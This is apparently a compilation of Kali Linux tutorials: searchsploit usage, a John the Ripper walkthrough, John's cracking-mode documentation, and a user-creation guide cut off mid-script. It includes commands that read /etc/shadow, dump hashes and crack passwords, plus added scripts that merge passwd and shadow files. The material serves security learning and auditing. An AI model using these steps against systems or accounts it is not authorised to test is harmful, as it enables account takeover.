    sqlmap dump and crack hashes for table users on database-name

Search exploits in metasploit

Metasploit was created by H. D. Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby. On October 21, 2009, the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions. Metasploit's emerging position as the de facto exploit development framework led to the release of software vulnerability advisories often accompanied by a third-party Metasploit exploit module that highlights the exploitability, risk and remediation of that particular bug. Metasploit 3.0 began to include fuzzing tools, used to discover software vulnerabilities, rather than just exploits for known bugs. This avenue can be seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November 2006. Metasploit 4.0 was released in August 2011. In this guide we will look into the most important part of using Metasploit: how to search for exploits within it! Yeah, like it or not, if you can't search, then you've got nada!

searchsploit

How many of you have used searchsploit in Kali Linux? It's a nice tool that updates and downloads exploits often. I use it quite extensively along with Metasploit.
Use searchsploit to search for specific exploits. You can use it like this:
root@kali:~# searchsploit wordpress denial
---------------------------------------------|----------------------------------
Description                                 |  Path
---------------------------------------------|----------------------------------
WordPress <=4.0 Denial of Service Exploit    | /php/webapps/35413.php
Wordpress < 4.0.1 - Denial of Service        | /php/webapps/35414.txt
---------------------------------------------|----------------------------------
root@kali:~#
Just in case you want to search for something else, use -h and it shows the help menu. Now help yourself to find more vulnerabilities.

A pretty easy way to search for exploits, actually, if you don't want to learn the Metasploit search options. Do share if you think it helped.

Cracking password in Kali Linux using John the Ripper

John the Ripper is a free password cracking software tool. Initially developed for the Unix operating system, it now runs on fifteen different platforms (eleven of which are architecture-specific versions of Unix, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing and breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix versions (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hashes. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL, and others. Cracking a password in Kali Linux using John the Ripper is very straightforward. In this post, I will demonstrate that.
John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations against a service daemon such as an FTP or telnet server. John, however, needs the hash first. So the greater challenge for a hacker is to first get the hash that is to be cracked. Nowadays hashes are more easily crackable using free rainbow tables available online. Just go to one of the sites, submit the hash and, if the hash is made of a common word, the site will show the word almost instantly. Rainbow tables basically store common words and their hashes in a large database. The larger the database, the more words are covered.
One of the modes John the Ripper can use is the dictionary attack. It takes text string samples (usually from a file, called a wordlist, containing words found in a dictionary or real passwords cracked before), hashes each one in the same format as the password being examined (including both the algorithm and any salt), and compares the output to the stored hash. It can also apply a variety of alterations to the dictionary words and try those. Many of these alterations are also used in John's single attack mode, which modifies an associated plaintext (such as the username that goes with a hashed password) and checks the variations against the hashes.
John also offers a brute force mode. In this type of attack, the program goes through all the possible plaintexts, hashing each one and then comparing it to the input hash. John uses character frequency tables to try plaintexts containing more frequently used characters first. This method is useful for cracking passwords which do not appear in dictionary wordlists, but it takes a long time to run.
John the Ripper uses a two-step process to crack a password. First it uses the passwd and shadow files to create a combined output file. Next, you run a dictionary attack against that file to crack it. In short, John the Ripper will use the following two files:
/etc/passwd
/etc/shadow

Cracking password using John the Ripper

In Linux, password hashes are stored in the /etc/shadow file. For the sake of this exercise, I will create a new user named john and assign him the simple password 'password'.
I will also add john to the sudo group and assign /bin/bash as his shell. There's a nice article I posted last year which explains user creation in Linux in great detail. It's a good read if you are interested in understanding the flags, and the same structure can be used on almost any Linux/Unix/Solaris operating system. Also, when you create a user, you need their home directory created, so go through the creating-a-user-in-Linux post if you have any doubts. Now, that's enough mumbo jumbo, let's get to business.
First let's create a user named john and assign 'password' as his password. (Very secure... yeah!)
root@kali:~# useradd -m john -G sudo -s /bin/bash
root@kali:~# passwd john
Enter new UNIX password: <password>
Retype new UNIX password: <password>
passwd: password updated successfully
root@kali:~#

Unshadowing password

Now that we have created our victim, let's start with the unshadow command. The unshadow command combines the entries of /etc/passwd and /etc/shadow to create one file with username and password details. When you just type in unshadow, it shows you the usage anyway.
root@kali:~# unshadow
Usage: unshadow PASSWORD-FILE SHADOW-FILE
root@kali:~# unshadow /etc/passwd /etc/shadow > /root/johns_passwd
I've redirected the output to the /root/johns_passwd file because I have a tic for organizing things. Do what you feel like here.
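To make clear what unshadow actually produces, here is the same join written out in Python. This is an added example, not part of the original post and not John's own code: it parses passwd- and shadow-style text, replaces the "x" placeholder in field 2 with the hash from the shadow entry for the same user, and emits lines in exactly the layout john later prints with --show. The two input files are constructed samples with placeholder hashes, not a real system's. The password_state helper is the defender's side of the same data: it reports which accounts are locked ("!" or "*"), which carry a real hash, and which have an empty field, meaning no password is required at all, which is the case worth alerting on in an audit.

```python
"""Join passwd and shadow on the username, the way unshadow does.

Added example, not part of the original post. PASSWD and SHADOW below are
constructed sample files with placeholder hashes (the $6$ prefix marks the
sha512crypt format john reported above; the hash bodies are not real).
"""


def parse_colon_file(text: str) -> dict:
    """Map username -> list of fields for a passwd- or shadow-style file."""
    rows = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        rows[fields[0]] = fields
    return rows


def unshadow(passwd_text: str, shadow_text: str) -> list:
    """Return passwd lines with the 'x' placeholder replaced by the shadow hash."""
    shadow = parse_colon_file(shadow_text)
    out = []
    for user, fields in parse_colon_file(passwd_text).items():
        if user in shadow and len(fields) >= 2 and len(shadow[user]) >= 2:
            fields = fields[:]             # copy; keep the parsed row untouched
            fields[1] = shadow[user][1]    # field 2 of shadow is the hash
        out.append(":".join(fields))
    return out


def password_state(shadow_text: str) -> dict:
    """username -> 'hashed', 'locked' ('!' or '*' prefix) or 'empty' (no password)."""
    state = {}
    for user, fields in parse_colon_file(shadow_text).items():
        h = fields[1] if len(fields) > 1 else ""
        if h == "":
            state[user] = "empty"          # login with no password: worth an alert
        elif h.startswith(("!", "*")):
            state[user] = "locked"
        else:
            state[user] = "hashed"
    return state


# Constructed sample input, same field layout as /etc/passwd and /etc/shadow.
PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
john:x:1000:1001::/home/john:/bin/bash
"""
SHADOW = """root:$6$EXAMPLESALT$EXAMPLEHASHPLACEHOLDER:16745:0:99999:7:::
daemon:*:16745:0:99999:7:::
john:$6$ANOTHERSALT$ANOTHERHASHPLACEHOLDER:16745:0:99999:7:::
"""

if __name__ == "__main__":
    for line in unshadow(PASSWD, SHADOW):
        print(line)
    print(password_state(SHADOW))
```

On a live system the two files are /etc/passwd and /etc/shadow and only root can read the second; the merged output is itself sensitive, so keep it with the same permissions as shadow and delete it when the exercise is over.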

Cracking process with John the Ripper

At this point we just need a dictionary file and can get on with cracking. John comes with its own small password file, located at /usr/share/john/password.lst. I've shown the size of that file using the following command.
root@kali:~# ls -ltrah /usr/share/john/password.lst
You can use your own password lists too, or download a large one from the Internet (there are dictionary files of terabyte size).
root@kali:~# john --wordlist=/usr/share/john/password.lst /root/johns_passwd 
Created directory: /root/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password         (john)
1g 0:00:00:06 DONE (2015-11-06 13:30) 0.1610g/s 571.0p/s 735.9c/s 735.9C/s modem..sss
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~#
Looks like it worked. So we can now use the john --show option to list the cracked passwords. Note that it's a simple password that existed in the dictionary, so it worked. If it wasn't a simple password, then you would need a much bigger dictionary and a lot longer to crack it.
root@kali:~# john --show /root/johns_passwd 
john:password:1000:1001::/home/john:/bin/bash

1 password hash cracked, 1 left
root@kali:~#

John the Ripper advanced commands:

Now that we have completed the basics of John the Ripper and cracked a password using it, it's possibly time to move on to bigger and more complex things. For that you should check the documentation on cracking MODES and examples of John the Ripper usage.

John the Ripper's cracking modes.

Mode descriptions here are short and only cover the basic things. Check other documentation files for information on customizing the modes.

Wordlist mode.

This is the simplest cracking mode supported by John. All you need to do is specify a wordlist (a text file containing one word per line) and some password files. You can enable word mangling rules (which are used to modify or "mangle" words producing other likely passwords). If enabled, all of the rules will be applied to every line in the wordlist file producing multiple candidate passwords from each source word. The wordlist should not contain duplicate lines. John does not sort entries in the wordlist since that would consume a lot of resources and would prevent you from making John try the candidate passwords in the order that you define (with more likely candidate passwords listed first). However, if you don't list your candidate passwords in a reasonable order, it'd be better if you sort the wordlist alphabetically: with some hash types, John runs a bit faster if each candidate password it tries only differs from the previous one by a few characters. Most wordlists that you may find on the Net are already sorted anyway. On the other hand, if your wordlist is sorted alphabetically, you do not need to bother about some wordlist entries being longer than the maximum supported password length for the hash type you're cracking. To give an example, for traditional DES-based crypt(3) hashes only the first 8 characters of passwords are significant. This means that if there are two or more candidate passwords in the wordlist whose first 8 characters are exactly the same, they're effectively the same 8 character long candidate password which only needs to be tried once. As long as the wordlist is sorted alphabetically, John is smart enough to handle this special case right. In fact, it is recommended that you do not truncate candidate passwords in your wordlist file since the rest of the characters (beyond the length limit of your target hash type) are likely still needed and make a difference if you enable word mangling rules.
The recommended way to sort a wordlist for use with the default wordlist rule set is:
 tr A-Z a-z < SOURCE | sort -u > TARGET
See RULES for information on writing your own wordlist rules.
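As an added example (not from the John the Ripper documentation above), the following shell script applies the recommended tr/sort preparation to a small constructed wordlist and then counts how many candidates a hash type that truncates at 8 characters, such as DES-based crypt(3), would actually have to try. The sample words and the 8-character limit are assumptions chosen to illustrate the point:

```bash
#!/usr/bin/env bash
# Added example, not part of John the Ripper. Prepares a wordlist the way the
# text recommends (lowercase, sorted, deduplicated) and shows why sorting
# matters for hashes that truncate passwords: with DES-based crypt(3) only
# the first 8 characters count, so adjacent entries sharing an 8-character
# prefix are really one candidate.
export LC_ALL=C   # byte-wise sort order, independent of the user's locale

# Constructed sample wordlist: mixed case, duplicates, and two entries that
# collide once truncated to 8 characters ("password1", "password123").
SAMPLE_WORDS='Password1
password
PASSWORD
password123
letmein
LetMeIn
eminem'

# Step from the text: tr A-Z a-z < SOURCE | sort -u > TARGET
prep_wordlist() {
    tr 'A-Z' 'a-z' | sort -u
}

# Count how many candidates a hash type that truncates at LEN characters
# would actually need to try. Because the list is sorted, candidates with the
# same LEN-character prefix are adjacent, so uniq on the truncated prefix
# gives the effective count (the special case John handles by itself).
effective_candidates() {
    len="$1"
    cut -c1-"$len" | uniq | wc -l | tr -d ' '
}

# Run the whole pipeline on the constructed sample and print
# "<distinct words> <effective candidates for an 8-char hash>".
demo_counts() {
    prepared=$(printf '%s\n' "$SAMPLE_WORDS" | prep_wordlist)
    total=$(printf '%s\n' "$prepared" | wc -l | tr -d ' ')
    des=$(printf '%s\n' "$prepared" | effective_candidates 8)
    printf '%s %s\n' "$total" "$des"
}
```

Source the file and run demo_counts: the five distinct prepared words collapse to three for an 8-character hash, while a hash type without truncation still needs all five. This is the same collapsing John performs itself on a sorted list, and it is why you should sort rather than truncate the wordlist when rules are enabled.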

"Single crack" mode.

This is the mode you should start cracking with. It will use the login names, "GECOS" / "Full Name" fields, and users' home directory names as candidate passwords, also with a large set of mangling rules applied. Since the information is only used against passwords for the accounts it was taken from (and against password hashes which happened to be assigned the same salt), "single crack" mode is much faster than wordlist mode. This permits for the use of a much larger set of word mangling rules with "single crack", and their use is always enabled with this mode. Successfully guessed passwords are also tried against all loaded password hashes just in case more users have the same password. Note that running this mode on many password files simultaneously may sometimes get more passwords cracked than it would if you ran it on the individual password files separately.

"Incremental" mode.

This is the most powerful cracking mode, it can try all possible character combinations as passwords. However, it is assumed that cracking with this mode will never terminate because of the number of combinations being too large (actually, it will terminate if you set a low password length limit or make it use a small charset), and you'll have to interrupt it earlier. That's one reason why this mode deals with trigraph frequencies, separately for each character position and for each password length, to crack as many passwords as possible within a limited time.

To use the mode you need a specific definition for the mode's parameters, including password length limits and the charset to use. These parameters are defined in the configuration file sections called [Incremental:MODE], where MODE is any name that you assign to the mode (it's the name that you will need to specify on John's command line). You can either use a pre-defined incremental mode definition or define a custom one.

As of version 1.8.0, pre-defined incremental modes are "ASCII" (all 95 printable ASCII characters), "LM_ASCII" (for use on LM hashes), "Alnum" (all 62 alphanumeric characters), "Alpha" (all 52 letters), "LowerNum" (lowercase letters plus digits, for 36 total), "UpperNum" (uppercase letters plus digits, for 36 total), "LowerSpace" (lowercase letters plus space, for 27 total), "Lower" (lowercase letters), "Upper" (uppercase letters), and "Digits" (digits only). The supplied .chr files include data for lengths up to 13 for all of these modes except for "LM_ASCII" (where password portions input to the LM hash halves are assumed to be truncated at length 7) and "Digits" (where the supplied .chr file and pre-defined incremental mode work for lengths up to 20). Some of the many .chr files needed by these pre-defined incremental modes might not be bundled with every version of John the Ripper, being available as a separate download. See CONFIG and EXAMPLES for information on defining custom modes.

External mode.

You can define an external cracking mode for use with John. This is done with the configuration file sections called [List.External:MODE], where MODE is any name that you assign to the mode. The section should contain program code of some functions that John will use to generate the candidate passwords it tries. The functions are coded in a subset of C and are compiled by John at startup when you request the particular external mode on John's command line. See EXTERNAL.

What modes should I use?

See EXAMPLES for a reasonable order of cracking modes to use.

John the Ripper - Usage Examples

John the Ripper usage examples.

These examples are to give you some tips on what John's features can be used for.

Command line.

1. First, you need to get a copy of your password file. If your system uses shadow passwords, you may use John's "unshadow" utility to obtain the traditional Unix password file, as root:
 umask 077
unshadow /etc/passwd /etc/shadow > mypasswd
(You may need to replace the filenames as needed.)
Then make "mypasswd" available to your non-root user account that you will run John under. No further commands will need to be run as root.
If your system is ancient enough that it keeps passwords right in the world-readable /etc/passwd, simply make a copy of that file.
If you're going to be cracking Kerberos AFS passwords, use John's "unafs" utility to obtain a passwd-like file.
Similarly, if you're going to be cracking Windows passwords, use any of the many utilities that dump Windows password hashes (LM and/or NTLM) in Jeremy Allison's PWDUMP output format. Some of these utilities may be obtained here:
 http://www.openwall.com/passwords/pwdump
2. Now, let's assume you've got a password file, "mypasswd", and want to crack it. The simplest way is to let John use its default order of cracking modes:
 john mypasswd
This will try "single crack" mode first, then use a wordlist with rules, and finally go for "incremental" mode. Please refer to MODES for more information on these modes.
It is highly recommended that you obtain a larger wordlist than John's default password.lst and edit the "Wordlist = ..." line in the configuration file (see CONFIG) before running John. Some wordlists may be obtained here:
 http://www.openwall.com/wordlists/
Of those available in the collection at the URL above, all.lst (downloadable as all.gz) and huge.lst (only available on the CD) are good candidates for the "Wordlist = ..." setting.
3. If you've got some passwords cracked, they are stored in $JOHN/john.pot. The john.pot file is not meant to be human-friendly. You should be using John itself to display the contents of its "pot file" in a convenient format:
 john --show mypasswd
If the account list gets large and doesn't fit on the screen, you should, of course, use your shell's output redirection.
You might notice that many accounts have a disabled shell. You can make John skip those in the report. Assuming that the disabled shell is called "/etc/expired", the command would be:
 john --show --shells=-/etc/expired mypasswd
or shorter, but will also match "/any/path/expired":
 john --show --shells=-expired mypasswd
or if you also want to ignore some other shell, say "/etc/newuser":
 john --show --shells=-expired,newuser mypasswd
To check if any root (UID 0) accounts got cracked:
 john --show --users=0 mypasswd
or to check for cracked root (UID 0) accounts in multiple files:
 john --show --users=0 *passwd* *.pwd
To display the root (username "root") account only:
 john --show --users=root mypasswd
And finally, to check for privileged groups:
 john --show --groups=0,1 mypasswd
4. You might prefer to manage the cracking modes manually. It is wise to start with "single crack" mode:
 john --single mypasswd
or since the GNU-style double dashes are optional and since option names can be abbreviated for as long as they remain unambiguous:
 john -si mypasswd
You should not abbreviate options in scripts which you would want to work with future versions of John since what is unambiguous now might become ambiguous with the addition of more options.
If you have more files to crack, it is preferable to load them at the same time:
 john --single passwd1 passwd2
or even:
 john --single *passwd* *.pwd
This way, John will run faster and might even crack more passwords than it would if you ran it on each password file separately.
5. To catch weak passwords not derived from readily available users' personal information, you should proceed with cracking modes demanding more processor time. First, let's try a tiny wordlist with word mangling rules enabled:
 john --wordlist=password.lst --rules mypasswd
or abbreviating the options:
 john -w=password.lst -ru mypasswd
Then proceed with a larger wordlist, also applying the mangling rules:
 john --wordlist=all.lst --rules mypasswd
If you've got a lot of spare disk space to trade for performance and the hash type of your password files is relatively slow, you may use John's "unique" utility to eliminate any duplicate candidate passwords:
 john --wordlist=all.lst --rules --stdout | unique mangled.lst
john --wordlist=mangled.lst mypasswd
If you know that your target hash type truncates passwords at a given length, you may optimize this even further:
 john --wordlist=all.lst --rules --stdout=8 | unique mangled8.lst
john --wordlist=mangled8.lst mypasswd
Alternatively, you may simply use huge.lst available on Openwall wordlist collection CDs. It has word mangling rules pre-applied for the most common languages and it has any duplicates purged.
Depending on target hash type, the number of different salts (if applicable), the size of your wordlist, rules, and processor performance, wordlist-based cracking may take anywhere from under a second to many days.
You do not have to leave John running on a (pseudo-)terminal. If running John on a Unix-like system, you can simply disconnect from the server, close your xterm, etc. John will catch the SIGHUP ("hangup" signal) and continue running. Alternatively, you may prefer to start it in the background right away:
 john --wordlist=all.lst --rules mypasswd &
Obviously, the "&" is specific to Unix shells and will not work on most other platforms.
You may further enhance this by specifying a session name:
 john --session=allrules --wordlist=all.lst --rules mypasswd &
This ensures that you won't accidentally interfere with the instance of John running in the background if you proceed to start other sessions.
To view the status of a running session, use:
 john --status
for the default session or:
 john --status=allrules
for any other session. This works for both interrupted and running sessions. To obtain the most up-to-date information from a running session on a Unix-like system, send a SIGHUP to the appropriate "john" process.
Any interrupted sessions may be continued with:
 john --restore
or:
 john --restore=allrules
Finally, to make John have less impact on other processes, you should set the option "Idle = Y" in the configuration file (see CONFIG). The default may vary depending on the version and build of JtR.
To only crack accounts with a "good" shell (in general, the shell, user, and group filters described above work for all cracking modes as well):
 john --wordlist=all.lst --rules --shells=sh,csh,tcsh,bash mypasswd
Like with all other cracking modes, it is faster to crack all the files you need cracked simultaneously:
 john --wordlist=all.lst --rules passwd1 passwd2
You can crack some passwords only. This will try cracking all root (UID 0) accounts in all the password files:
 john --wordlist=all.lst --rules --users=0 *passwd*
Alternatively, you may wish to not waste time cracking your very own passwords, if you're sure they're uncrackable:
 john --wordlist=all.lst --rules --users=-root,solar *passwd*
Sometimes it is useful to split your password hashes into two sets which you crack separately, like:
 john --wordlist=all.lst --rules --salts=2 *passwd*
john --wordlist=all.lst --rules --salts=-2 *passwd*
This will make John try salts used on two or more password hashes first and then try the rest. Total cracking time will be almost the same, but you will get some passwords cracked earlier, which is useful, for example, for penetration testing and demonstrations to management. Similarly, you may check all password hashes with a small wordlist, but only those that you can check faster (with "--salts=2") with a larger one. With large numbers of password hashes and/or with a highly non-uniform distribution of salts, it may be appropriate to use a threshold larger than 2 with "--salts" (sometimes even values as high as 1000 will do).
Note that the default wordlist rules include ":" (a no-op: try words as they are in the list) on the first line. If you already ran through a wordlist without using rules, and then decided to also try the same wordlist with rules, you'd better comment this line out.
6. The most powerful cracking mode in John is called "incremental" (not a proper name, but kept for historical reasons). You can simply run:
 john --incremental mypasswd
or:
 john -i mypasswd
This will use the default "incremental" mode parameters, which are defined in the configuration file's section named either [Incremental:ASCII] (for most hash types) or [Incremental:LM_ASCII] (for Windows LM hashes). By default, the [Incremental:ASCII] parameters are set to use the full printable ASCII character set (95 characters) and to try all possible password lengths from 0 to 13 (if the current hash type has a lower maximum password length, incremental mode's length limit is reduced accordingly). [Incremental:LM_ASCII] is similar, except that it takes advantage of LM hashes being case-insensitive and of their halves being limited to 7 characters each.
Don't expect "incremental" mode sessions to terminate in a reasonable time (unless all the passwords are weak and get cracked), read MODES for an explanation of this.
In some cases it is faster to use some other pre-defined incremental mode parameters and only crack simpler passwords, from a limited character set. The following command will try 10 different characters only, passwords from "0" to "99999999999999999999" (in an optimal order):
 john -i=digits mypasswd
Of course, you can use most of the additional features demonstrated above for wordlist mode with "incremental" mode as well. For example, on a large-scale penetration test, you may have John crack only root (UID 0) accounts in a set of password files:
 john -i -u=0 *.pwd
7. If you've got a password file for which you already have a lot of passwords cracked or obtained by other means, and the passwords are unusual, then you may want to generate a new charset file, based on character frequencies from that password file only:
 john --make-charset=custom.chr mypasswd
Then use that new file with "incremental" mode.
If you�ve got many password files from a particular country, organization, etc., it might be useful to use all of them for the charset file that you then use to crack even more passwords from these files or from some other password files from the same place:
 john --make-charset=custom.chr passwd1 passwd2
[ Configure your custom "incremental" mode now. See below. ]
john -i=custom passwd3
You can use some pre-defined or custom word filters when generating the charset file to have John consider some simpler passwords only:
 john --make-charset=my_alpha.chr --external=filter_alpha mypasswd
If your "pot file" got large enough (or if you don't have any charset files at all), you might want to use it to generate a new set of main charset files:
 makechr
where "makechr" is a script that invokes "john --make-charset=..." with varying filenames, for all of the external mode word filters defined in the configuration file. In this example, John will overwrite the charset files with new ones that are based on your entire $JOHN/john.pot (John uses the entire "pot file" if you don't specify any password files).
8. Finally, you might want to e-mail all users with weak passwords to tell them to change their passwords. (This is not always a good idea, though, since lots of people do not check their e-mail or ignore such messages, and the messages can be a hint for crackers.) Edit the "mailer" script supplied with John: the message it sends and possibly the mail command (especially if the password file is from a different machine). Then run:
 mailer mypasswd
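The unshadow step and the --users/--shells filters from items 1 and 3 above can be reproduced with awk, which is useful when John is not installed on the box that holds the files or when you want to see which accounts a report will cover before starting a long session. This is an added example with constructed passwd and shadow lines (the hash fields are placeholders, not real hashes); it is not John's own code:

```bash
#!/usr/bin/env bash
# Added example, not part of John the Ripper. Reproduces with awk what the
# "unshadow" utility does (merge /etc/passwd and /etc/shadow into the
# traditional 7-field format John expects) and what the --users / --shells
# filters of "john --show" select. Sample lines are constructed; the hash
# strings are placeholders.
export LC_ALL=C

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/etc/expired
alice:x:1000:1000:Alice Example:/home/alice:/bin/bash
bob:x:1001:1001:Bob Example:/home/bob:/etc/newuser
toor:x:0:0:second root:/root:/bin/sh'

SAMPLE_SHADOW='root:$6$saltroot$HASHROOT:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
alice:$6$saltalice$HASHALICE:19000:0:99999:7:::
bob:!:19000:0:99999:7:::
toor:$6$salttoor$HASHTOOR:19000:0:99999:7:::'

# unshadow_awk PASSWD SHADOW: replace the "x" in passwd field 2 with the
# hash from the shadow entry of the same user. Accounts with no shadow entry
# keep their passwd field, as the real tool does.
unshadow_awk() {
    awk -F: -v OFS=: '
        NR == FNR { hash[$1] = $2; next }   # first file: shadow
        ($1 in hash) { $2 = hash[$1] }      # second file: passwd
        { print }
    ' "$2" "$1"
}

# Keep only accounts with the given numeric UID (john --show --users=0).
filter_uid() {
    awk -F: -v uid="$1" '$3 == uid'
}

# Drop accounts whose shell is, or ends in, any of the comma-separated
# names (john --show --shells=-expired,newuser). Matching the basename is the
# short form the text warns "will also match /any/path/expired".
exclude_shells() {
    awk -F: -v list="$1" '
        BEGIN { n = split(list, names, ",") }
        {
            keep = 1
            for (i = 1; i <= n; i++)
                if ($7 == names[i] || $7 ~ ("/" names[i] "$")) keep = 0
            if (keep) print
        }'
}

# Write the samples to temporary files and merge them, as you would merge
# copies of /etc/passwd and /etc/shadow (keep umask 077: the result holds
# hashes).
merge_samples() {
    tmp=$(mktemp -d)
    printf '%s\n' "$SAMPLE_PASSWD" > "$tmp/passwd"
    printf '%s\n' "$SAMPLE_SHADOW" > "$tmp/shadow"
    unshadow_awk "$tmp/passwd" "$tmp/shadow"
    rm -rf "$tmp"
}

# Usernames that survive a filter: "uid0", "noexpired" or "all".
demo_accounts() {
    case "$1" in
        uid0)      merge_samples | filter_uid 0 ;;
        noexpired) merge_samples | exclude_shells expired,newuser ;;
        *)         merge_samples ;;
    esac | cut -d: -f1 | tr '\n' ' '
}
```

merge_samples prints the merged file; demo_accounts uid0 shows that the filter catches "toor" as well as "root", which is exactly the second UID 0 account a --users=root report would miss.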

Configuration file.

Please refer to CONFIG for general information on the configuration file and its possible locations.
1. Let's assume that you notice that in some password file a lot of users have their passwords set to login names with "?!" appended. Then you just make a new "single crack" mode rule (see RULES for information on the syntax) and place it somewhere near the beginning:
 [List.Rules:Single]
Az"?!"
Hint: if you want to temporarily disable all of the default rules, you can simply rename the section to something John doesn't use and define a new one with the section's old name, but be sure to leave the "List." prefix of the name intact to maintain correct configuration file syntax.
All the same applies to wordlist mode rules as well.
2. If you generate a custom charset file (described above) you will also need to define a configuration file section with the "incremental" mode parameters. In the simplest case it will be like this (where "Custom" can be replaced with any name you like):
 [Incremental:Custom]
File = custom.chr
This way, John will only use characters from the passwords that were used to generate the charset file. To make John try some more characters, add:
 Extra = !@#$%
These extra characters will then be added, but still considered the least probable. If you want to make sure that, with your extra characters, John will try 95 different characters, you can add:
 CharCount = 95
This will make John print a warning if it only has fewer than 95 characters in its charset.
You can also use CharCount to limit the number of different characters that John tries, even if the charset file has more:
 CharCount = 20
If you didn�t use any filters when generating the charset file, setting CharCount this low will make John never attempt rare characters and character combinations, not even for really short passwords, spending the time on simple longer candidate passwords instead. However, the default length switching is usually smart enough so that you shouldn�t need this trick.
To make John try passwords of certain lengths only, use the following lines:
 MinLen = 6
MaxLen = 8
Setting "MinLen" high, as in the example above, is reasonable if shorter passwords weren't allowed to be set on the machine you got the password file from (however, note that root can usually set any password for any user and there are often loopholes in operating systems' password policy enforcement capabilities).
On the contrary, you may want to set �MaxLen� low if you think there are a lot of short passwords.
3. Another example: a lot of users at some site use short duplicated words as their passwords, such as "fredfred". As the number of such potential passwords is fairly low, it makes sense to code a new external cracking mode that tries them all, up to some length.
You can find the actual implementation of such a cracking mode with lots of comments in the default configuration file supplied with John. Please refer to EXTERNAL for information on the programming language used.

How to add remove user (standard user/non-root) in Kali Linux

This guide will walk you through how to add and remove a user (standard user or non-root user) in Kali Linux. I've tested this in Kali Linux, so any Debian or Debian derivative (such as Ubuntu) should just work.

This guide accomplishes:

The main reason I wanted to try this was to demonstrate the following:
  1. Add a user with all user directories already in place (thereby avoiding "Could not update .ICEauthority var/lib/gdm3/.ICEauthority" or any error mentioning .ICEauthority or permissions in general).
  2. Add the user to the sudo group to allow them to run root commands. You can also add the user to the "lpadmin" group to allow printing on Canon, HP and similar printers.
  3. Change the user's default login shell (with chsh) to bash, or to any other shell such as the Bourne shell (sh), C shell (csh) or Korn shell (ksh).
  4. Log in as that user and demonstrate there were no errors.
  5. Be able to use sudo and show group membership.
  6. Delete that user safely.

Benefits of Standard User in Kali:

A few benefits you have as a non-root or standard user in Kali:
  1. Install and run Google Chrome
  2. Install and run the Gnome Users and Groups manager (install gnome-system-tools)
  3. Use Kali as your primary operating system without worrying about breaking it all the time.
Now let's move on to the actual guide.

Add user in Kali Linux:

  • First of all let's confirm which version of Linux and kernel I'm running. In a terminal type:
    uname -a
    lsb_release -a
  • Now let's add the user. Open a terminal and type the following to create a new user (replace user1 with your desired user name):
    useradd -m user1
    (Note: -m means create the home directory, usually /home/username, populated from /etc/skel. Creating it up front is what avoids the .ICEauthority errors mentioned above.)
  • Now set a password for this user:
    passwd user1
    Enter the desired password twice.
  • Add the user to the sudo group (to allow the user to install software, allow printing, use privileged mode etc.):
    usermod -a -G sudo user1
    (Note: -a means append and -G specifies the supplementary group(s). Do not omit -a: usermod -G without it replaces the user's existing supplementary groups with the list given. New group membership takes effect at the user's next login.)
  • Change the default shell of the newly created user to bash:
    chsh -s /bin/bash user1
    (Note: chsh means change login shell; -s gives the path of the shell you want for the user, in this case /bin/bash. On Debian-based systems useradd defaults to /bin/sh unless -s is given, which is why this step is needed.)
    Nice, all worked out as expected.
    Let's log out and log back in as our new standard non-root user (user1).
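The steps above, plus the removal step the guide lists but never shows, combined into one script. This is an added example and not part of the original guide; the DO_IT switch and the function names are my own, and the 32-character username limit is useradd's default. Without DO_IT=1 it only prints the commands it would run, which is how it can be reviewed safely on a machine where you are not root:

```bash
#!/usr/bin/env bash
# Added example, not from the original guide. Wraps the add-user steps into a
# single useradd call (home directory, bash shell and sudo group in one go),
# and adds the removal step, with the checks you want before touching
# /etc/passwd: a valid username, no existing account, no accidental loss of
# group membership, and never deleting a UID 0 account. Nothing is executed
# unless DO_IT=1 (and you are root); otherwise commands are only printed.
export LC_ALL=C   # keep [a-z] a plain ASCII range in the pattern below

# Portable username: lowercase letters, digits, underscore, hyphen; must not
# start with a hyphen; at most 32 characters (useradd's default limit).
valid_username() {
    case "$1" in
        ''|-*|*[!a-z0-9_-]*) return 1 ;;
    esac
    [ "${#1}" -le 32 ]
}

# Run the command for real only when DO_IT=1; print it otherwise.
run() {
    if [ "${DO_IT:-0}" = 1 ]; then
        "$@"
    else
        printf '%s\n' "$*"
    fi
}

# add_standard_user NAME [EXTRA_GROUPS]: home from /etc/skel (-m), bash as
# login shell (-s), sudo plus any extra comma-separated groups such as
# lpadmin as supplementary groups (-G). Refuses to clobber an existing user.
add_standard_user() {
    user="$1"; extra="${2:-}"
    grp_list="sudo${extra:+,$extra}"
    valid_username "$user" || { echo "invalid username: $user" >&2; return 2; }
    if [ "${DO_IT:-0}" = 1 ] && getent passwd "$user" >/dev/null; then
        echo "user already exists: $user" >&2; return 3
    fi
    run useradd -m -s /bin/bash -G "$grp_list" "$user"
    run passwd "$user"     # prompts for the password twice, as in the guide
}

# add_to_group NAME GROUP: append a group later; -a is what stops -G from
# replacing the groups the user already has.
add_to_group() {
    run usermod -a -G "$2" "$1"
}

# remove_standard_user NAME: refuse UID 0, end the user's processes first so
# userdel -r can remove the home directory cleanly.
remove_standard_user() {
    user="$1"
    valid_username "$user" || { echo "invalid username: $user" >&2; return 2; }
    if [ "${DO_IT:-0}" = 1 ] && [ "$(id -u "$user" 2>/dev/null)" = 0 ]; then
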